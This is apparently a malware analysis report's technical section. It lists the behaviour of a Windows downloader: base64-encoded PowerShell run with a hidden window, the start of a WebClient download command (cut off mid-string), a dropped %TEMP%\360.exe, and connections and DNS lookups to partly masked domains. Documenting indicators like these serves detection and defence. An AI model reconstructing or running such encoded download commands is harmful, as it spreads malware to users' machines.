Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AH...
- %TEMP%\360.exe
- %TEMP%\360.exe
- 'po###astaff.ru':80
- 'we#######homecareservices.co.uk':80
- 'vk###.kultkam.ru':80
- DNS ASK lo#####eelancersng.com
- DNS ASK po###astaff.ru
- DNS ASK we#######homecareservices.co.uk
- DNS ASK vk###.kultkam.ru
- DNS ASK be#######brainsmagazine.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AH...' (with hidden window)